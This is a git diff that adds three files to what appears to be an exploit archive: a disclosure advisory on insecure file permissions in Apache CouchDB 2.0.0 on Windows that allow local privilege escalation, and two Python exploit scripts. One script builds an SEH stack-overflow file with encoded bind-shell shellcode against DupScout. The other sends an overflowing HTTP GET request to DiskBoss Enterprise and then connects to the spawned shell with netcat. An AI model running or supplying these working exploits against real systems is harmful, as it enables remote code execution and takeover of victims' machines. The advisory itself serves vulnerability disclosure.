a/platforms/windows/local/40865.txt b/platforms/windows/local/40865.txt new file mode 100755 index 000000000..4e67c9aae --- /dev/null +++ b/platforms/windows/local/40865.txt @@ -0,0 +1,114 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: http://hyp3rlinx.altervista.org/advisories/APACHE-COUCHDB-LOCAL-PRIVILEGE-ESCALATION.txt + +[+] ISR: ApparitionSec + + + +Vendor: +================== +couchdb.apache.org + + + +Product: +============== +CouchDB v2.0.0 + +Apache CouchDB is open source database software that focuses on ease of use +and having an architecture. It has a document-oriented +NoSQL database architecture and is implemented in the concurrency-oriented +language Erlang; it uses JSON to store data, JavaScript +as its query language using MapReduce, and HTTP for an API. + + +Vulnerability Type: +=================== +Privilege Escalation (Insecure File Permissions) + + + +CVE Reference: +============== +N/A + + + +Vulnerability Details: +===================== + +CouchDB sets weak file permissions potentially allowing 'Standard' Windows +users to elevate privileges. The "nssm.exe" (Apache CouchDB) +executable can be replaced by a 'Standard' non administrator user, allowing +them to add a backdoor Administrator account once the +"Apache CouchDB" service is restarted or system rebooted. + +As Apache CouchDB runs as LOCALSYSTEM, standard users can now execute +arbitrary code with the privileges of the SYSTEM. + +Issue is the 'C' flag (Change) for 'Authenticated Users' group. + + +e.g. + +c:\CouchDB>cacls * | findstr Users + + BUILTIN\Users:(OI)(CI)(ID)R + NT AUTHORITY\Authenticated Users:(ID)C + NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C + BUILTIN\Users:(OI)(CI)(ID)R + NT AUTHORITY\Authenticated Users:(ID)C + NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C + BUILTIN\Users:(OI)(CI)(ID)R + NT AUTHORITY\Authenticated Users:(ID)C + NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C + + + +c:\CouchDB>sc qc "Apache CouchDB" +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: Apache CouchDB + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\CouchDB\bin\nssm.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : Apache CouchDB + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + + + + +Exploitation Technique: +======================= +Local + + + +Severity Level: +================ +Medium + + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +hyp3rlinx diff --git a/platforms/windows/remote/40868.py b/platforms/windows/remote/40868.py new file mode 100755 index 000000000..4037db708 --- /dev/null +++ b/platforms/windows/remote/40868.py @@ -0,0 +1,78 @@ +#!/usr/bin/python +#Open the DupScout client and click on Tools > click on Connect Network Drive > type the content of boom.txt in the "User Name" field. The payload is sent to the DupScout server (port 9126) +#SEH based stack overflow in DupScout server +#Tested in Windows 7 Professional +#For educational proposes only + +#msfvenom -a x86 --platform windows -p windows/shell/bind_tcp LPORT=4444 -e x86/alpha_mixed BufferRegister=EAX -f python +buf = "" +buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x49\x6c\x49\x78\x6f\x72\x47\x70\x57\x70\x45\x50\x43" +buf += "\x50\x4e\x69\x49\x75\x30\x31\x59\x50\x31\x74\x4e\x6b" +buf += "\x30\x50\x34\x70\x4e\x6b\x53\x62\x66\x6c\x4c\x4b\x36" +buf += "\x32\x45\x44\x4e\x6b\x52\x52\x44\x68\x34\x4f\x6d\x67" +buf += "\x71\x5a\x51\x36\x76\x51\x49\x6f\x6c\x6c\x57\x4c\x70" +buf += "\x61\x61\x6c\x53\x32\x34\x6c\x61\x30\x4b\x71\x38\x4f" +buf += "\x44\x4d\x43\x31\x78\x47\x4b\x52\x4c\x32\x72\x72\x42" +buf += "\x77\x4e\x6b\x36\x32\x44\x50\x6c\x4b\x72\x6a\x45\x6c" +buf += "\x4e\x6b\x62\x6c\x32\x31\x51\x68\x4d\x33\x71\x58\x36" +buf += "\x61\x78\x51\x72\x71\x4c\x4b\x30\x59\x65\x70\x66\x61" +buf += "\x4a\x73\x6c\x4b\x73\x79\x72\x38\x7a\x43\x64\x7a\x43" +buf += "\x79\x6c\x4b\x46\x54\x6c\x4b\x36\x61\x6a\x76\x75\x61" +buf += "\x49\x6f\x4e\x4c\x5a\x61\x48\x4f\x34\x4d\x55\x51\x4b" +buf += "\x77\x74\x78\x6b\x50\x74\x35\x6b\x46\x35\x53\x73\x4d" +buf += "\x68\x78\x77\x4b\x43\x4d\x31\x34\x62\x55\x4b\x54\x33" +buf += "\x68\x4e\x6b\x73\x68\x64\x64\x66\x61\x58\x53\x73\x56" +buf += "\x6e\x6b\x74\x4c\x50\x4b\x6e\x6b\x73\x68\x75\x4c\x57" +buf += "\x71\x38\x53\x4c\x4b\x44\x44\x6e\x6b\x77\x71\x4e\x30" +buf += "\x6b\x39\x77\x34\x65\x74\x37\x54\x51\x4b\x53\x6b\x30" +buf += "\x61\x46\x39\x43\x6a\x42\x71\x69\x6f\x79\x70\x53\x6f" +buf += "\x53\x6f\x43\x6a\x6e\x6b\x66\x72\x7a\x4b\x4e\x6d\x71" +buf += "\x4d\x71\x78\x74\x73\x70\x32\x65\x50\x75\x50\x75\x38" +buf += "\x34\x37\x54\x33\x56\x52\x71\x4f\x56\x34\x63\x58\x30" +buf += "\x4c\x74\x37\x46\x46\x56\x67\x49\x6f\x4b\x65\x58\x38" +buf += "\x4c\x50\x35\x51\x73\x30\x65\x50\x55\x79\x4b\x74\x71" +buf += "\x44\x30\x50\x71\x78\x51\x39\x4b\x30\x32\x4b\x55\x50" +buf += "\x6b\x4f\x4b\x65\x62\x4a\x66\x6b\x51\x49\x56\x30\x69" +buf += "\x72\x69\x6d\x51\x7a\x65\x51\x32\x4a\x37\x72\x73\x58" +buf += "\x6b\x5a\x76\x6f\x4b\x6f\x4b\x50\x6b\x4f\x59\x45\x5a" +buf += "\x37\x73\x58\x76\x62\x53\x30\x77\x61\x43\x6c\x6b\x39" +buf += "\x48\x66\x43\x5a\x42\x30\x62\x76\x43\x67\x30\x68\x5a" +buf += "\x62\x79\x4b\x54\x77\x53\x57\x6b\x4f\x79\x45\x4f\x75" +buf += "\x6f\x30\x51\x65\x36\x38\x66\x37\x42\x48\x58\x37\x4d" +buf += "\x39\x45\x68\x49\x6f\x49\x6f\x6b\x65\x32\x77\x70\x68" +buf += "\x52\x54\x5a\x4c\x67\x4b\x6d\x31\x69\x6f\x38\x55\x30" +buf += "\x57\x6a\x37\x52\x48\x44\x35\x50\x6e\x70\x4d\x73\x51" +buf += "\x49\x6f\x4e\x35\x62\x4a\x65\x50\x50\x6a\x54\x44\x30" +buf += "\x56\x66\x37\x31\x78\x46\x62\x4a\x79\x78\x48\x71\x4f" +buf += "\x69\x6f\x5a\x75\x4f\x73\x6b\x48\x35\x50\x53\x4e\x66" +buf += "\x4d\x4e\x6b\x45\x66\x73\x5a\x37\x30\x52\x48\x35\x50" +buf += "\x76\x70\x75\x50\x53\x30\x43\x66\x50\x6a\x43\x30\x30" +buf += "\x68\x62\x78\x49\x34\x32\x73\x7a\x45\x4b\x4f\x68\x55" +buf += "\x4d\x43\x56\x33\x70\x6a\x55\x50\x46\x36\x62\x73\x53" +buf += "\x67\x32\x48\x35\x52\x6b\x69\x78\x48\x51\x4f\x79\x6f" +buf += "\x79\x45\x6d\x53\x69\x68\x37\x70\x53\x4e\x67\x77\x46" +buf += "\x61\x39\x53\x55\x79\x6b\x76\x34\x35\x7a\x49\x6f\x33" +buf += "\x41\x41" + +nseh = "\x54\x58\x41\x41" +seh = "\x4f\x40\x12\x10" + +align = "\x05\x34\x28\x25\x41" #add eax,0x41252843 +align += "\x2d\x7e\43\x25\x41" #sub eax,0x4125437e +align += "\x50" #push eax +align += "\xc3" #ret + +offset = 1584 + +buffer = "\x41"*175 + buf +buffer += "\x42"*(offset-175-len(buf)) +buffer += nseh + seh +buffer += align + "\x44"*(1000-len(align)) + +file = open('boom.txt','w') +file.write(buffer) +file.close() diff --git a/platforms/windows/remote/40869.py b/platforms/windows/remote/40869.py new file mode 100755 index 000000000..db61a8fff --- /dev/null +++ b/platforms/windows/remote/40869.py @@ -0,0 +1,67 @@ +#!/usr/bin/python +import socket,os,time + +#SEH Stack Overflow in GET request +#DiskBoss Enterprise 7.4.28 +#Tested on Windows XP SP3 & Windows 7 Professional +#For educational proposes only + +host = "192.168.1.20" +port = 80 + +#badchars \x00\x09\x0a\x0d\x20 +#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00\x09\x0a\x0d\x20" -f python +buf = "" +buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33" +buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc" +buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8" +buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f" +buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35" +buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43" +buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f" +buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01" +buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6" +buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff" +buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2" +buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9" +buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7" +buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51" +buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04" +buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9" +buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23" +buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98" +buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97" +buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5" +buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5" +buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd" +buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b" +buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b" +buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9" +buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90" +buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8" +buf += "\xc4\x25\x3d\xe9" + +#Overwrite SEH handler +stackpivot = "\x5c\x60\x04\x10" #ADD ESP,0x68 + RETN + +buf_len = 5250 + +crash = "\x90"*20 + buf + "\x41"*(2491-20-len(buf)) + stackpivot + "\x44"*(buf_len-8-2487) + +request = "GET /" + crash + "HTTP/1.1" + "\r\n" +request += "Host: " + host + "\r\n" +request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n" +request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n" +request += "Accept-Language: en-US,en;q=0.5" + "\r\n" +request += "Accept-Encoding: gzip, deflate" + "\r\n" +request += "Connection: keep-alive" + "\r\n\r\n" + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect((host,port)) +s.send(request) + +s.close() + +print "Waiting for shell..." +time.sleep(5) +os.system("nc " + host + " 4444")